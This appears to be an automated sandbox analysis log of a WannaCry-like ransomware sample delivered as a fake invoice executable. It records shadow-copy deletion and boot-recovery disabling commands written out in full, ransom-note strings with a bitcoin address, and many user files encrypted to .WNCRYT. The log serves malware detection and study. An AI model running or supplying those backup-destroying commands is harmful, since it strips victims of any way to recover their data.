            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: cmd.exe, 0000004D.00000002.2456061422.00000000033A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exe/cvssadmindeleteshadows/all/quiet&wmicshadowcopydelete&bcdedit/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenabledno&wbadmindeletecatalog-quiet
            Source: cmd.exe, 0000004D.00000002.2456061422.00000000033A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\SysWOW64\cmd.exe" c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: cmd.exe, 0000004D.00000002.2454989413.0000000002D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\Default
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows=8f
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe.10.drBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe.10.drBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
            Modifies existing user documents (likely ransomware behavior)
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile moved: C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdfJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile deleted: C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdfJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile moved: C:\Users\user\Desktop\NIRMEKAMZH.mp3Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile deleted: C:\Users\user\Desktop\NIRMEKAMZH.mp3Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile moved: C:\Users\user\Desktop\HMPPSXQPQV\VWDFPKGDUF.xlsxJump to behavior
            Writes many files with high entropy
            Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip entropy: 7.99931242378Jump to dropped file
            Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe entropy: 7.99547094116Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRYT entropy: 7.99043912244Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRYT entropy: 7.99990849273Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT entropy: 7.9995679726Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRYT entropy: 7.9960800471Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT entropy: 7.99802962828Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRYT entropy: 7.99590606653Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRYT entropy: 7.99882085293Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRYT entropy: 7.99940273021Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRYT entropy: 7.99962939996Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRYT entropy: 7.99700668457Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT entropy: 7.99757883385Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRYT entropy: 7.99694154247Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99980432681Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRYT entropy: 7.99787015795Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996173264Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRYT entropy: 7.99671244277Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99949809295Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].png.WNCRYT entropy: 7.9910278599Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[2].png.WNCRYT entropy: 7.99088540788Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT entropy: 7.99037158838Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[2].png.WNCRYT entropy: 7.99141359559Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[3].png.WNCRYT entropy: 7.99304008674Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT entropy: 7.99990658852Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].png.WNCRYT entropy: 7.99069753968Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].svg.WNCRYT entropy: 7.99842666446Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT entropy: 7.99436172655Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].svg.WNCRYT entropy: 7.99823264997Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT entropy: 7.99986298769Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[2].png.WNCRYT entropy: 7.99234076161Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT entropy: 7.99175047349Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT entropy: 7.99993842295Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\y1DovzXWmZOic4QXLXu-qBKEMRM.br[1].js.WNCRYT entropy: 7.99733463819Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT entropy: 7.99978863472Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99989735433Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT entropy: 7.99947194807Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99990451898Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT entropy: 7.99811760784Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT entropy: 7.99967272227Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT entropy: 7.99829537033Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582984954725.txt.WNCRYT entropy: 7.99833518582Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT entropy: 7.99938505594Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410583284348700.txt.WNCRYT entropy: 7.99851139262Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT entropy: 7.99960343992Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584556659274.txt.WNCRYT entropy: 7.9983023214Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584609702615.txt.WNCRYT entropy: 7.99847071519Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT entropy: 7.99986148704Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410586637015569.txt.WNCRYT entropy: 7.99828812156Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498762936491601.txt.WNCRYT entropy: 7.99836051251Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763235716446.txt.WNCRYT entropy: 7.99848327859Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763707955679.txt.WNCRYT entropy: 7.99832759783Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99973269348Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRYT entropy: 7.99919248056Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRYT entropy: 7.99921736722Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99131035969Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.991931964Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99340694608Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99268727442Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT entropy: 7.99096314975Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99948616661Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRYT entropy: 7.99797071147Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.WNCRYT entropy: 7.99751823991Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT entropy: 7.99861469809Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99980718063Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.9913189825Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99993977368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991549121Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99982084665Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99632635728Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99986205221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99984031204Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99981121368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.9998289363Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995472416Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99382500932Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRYT entropy: 7.99959486929Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT entropy: 7.9995646137Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT entropy: 7.99920831239Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRYT entropy: 7.99457580934Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99982687688Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRYT entropy: 7.99459450107Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99632261397Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99985568418Jump to dropped file
